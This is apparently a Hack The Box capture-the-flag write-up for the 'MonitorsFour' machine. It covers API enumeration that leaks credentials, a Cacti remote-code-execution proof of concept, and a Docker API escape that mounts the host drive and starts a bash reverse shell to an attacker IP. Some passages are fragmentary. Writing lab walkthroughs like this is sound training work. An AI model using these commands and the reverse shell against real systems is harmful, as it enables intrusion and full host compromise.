MonitorsFour is an Active Directory machine on Hack The Box that features a vulnerable API endpoint leading to credential leakage, followed by an authenticated RCE in Cacti, and ultimately a full Docker escape via SSRF to achieve host compromise.
# Nmap 7.95 scan initiated Sat Dec 6 23:00:22 2025 as: /usr/lib/nmap/nmap --privileged -sVC -oN nmap/Monitor 10.10.11.98
Nmap scan report for monitorsfour.htb (10.10.11.98)
Host is up (0.14s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: 889DCABDC39A9126364F6A675AA4167D
|_http-title: MonitorsFour - Networking Solutions
| http-methods:
|_ Supported Methods: GET
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 6 23:01:07 2025 -- 1 IP address (1 host up) scanned in 45.70 seconds

sudo echo -e '\n10.10.11.98 monitorsfour.htb cacti.monitorsfour.htb' | sudo tee -a /etc/hosts
/api/v1/user)The parameter id was vulnerable to enumeration due to lack of authentication and predictable IDs.
Impact: Enumeration → Credential leakage → Dashboard access.
Sensitive user data was exposed without token validation or rate limiting, enabling credential harvesting.
seq 1 100 > list
ffuf -u "https://monitorsfour.htb/api/v1/user?id=FUZZ&token=0" -w list -ac

# leaked user data
https://monitorsfour.htb/api/v1/user?id=2&token=0

username: admin password: wonderful1

admin name marcus

Using leaked credentials, an attacker triggers a command-injection flaw in Cacti, gaining container-level execution.
login with username: marcus password: wonderful1

https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC
python3 exploit.py -u <USERNAME> -p <PASSWORD> -i <ATTACKER-IP> -l <PORT> -url https://cacti.monitorsfour.htb

we see the the Infrastructure were Migrated to Windows and Docker Desktop 4.44.2

A vulnerable application allowed Server-Side Request Forgery (SSRF) to reach the Docker Remote API exposed on localhost:2375 (HTTP, no authentication).
This API grants full control over Docker, enabling container creation, filesystem mounting, and arbitrary command execution.
Impact:
SSRF → Docker API access → Create container → Bind host filesystem → Execute reverse shell → Host compromise.
Exploit Chain:
cid=$(curl -s -X POST -H \"Content-Type: application/json\" \
-d '{\"Image\":\"docker_setup-nginx-php:latest\",\"Cmd\":[\"bash\",\"-c\",\"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"],\"HostConfig\":{\"Binds\":[\"/mnt/host/c:/host_root\"]}}' \
https://DOCKER_HOST:2375/containers/create | cut -d'\"' -f4) \
&& curl -s -X POST https://DOCKER_HOST:2375/containers/$cid/start
Why it works:
The Docker daemon API (2375/tcp) is essentially a remote-root interface when exposed without TLS or authentication.
Through SSRF, the attacker reaches it indirectly and:
Severity: Critical — No user interaction required, leads to full system takeover.
Docker Escape on Windows Docker Desktop CVE-2025-9074
cid=$(curl -s -X POST -H "Content-Type: application/json" -d '{"Image":"docker_setup-nginx-php:latest","Cmd":["bash","-c","bash -i >& /dev/tcp/10.10.0.0/443 0>&1"],"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}' https://192.168.65.7:2375/containers/create | cut -d'"' -f4) && curl -s -X POST https://192.168.65.7:2375/containers/$cid/start
# root flag
cat /host_root/Users/Administrator/Desktop/root.txt
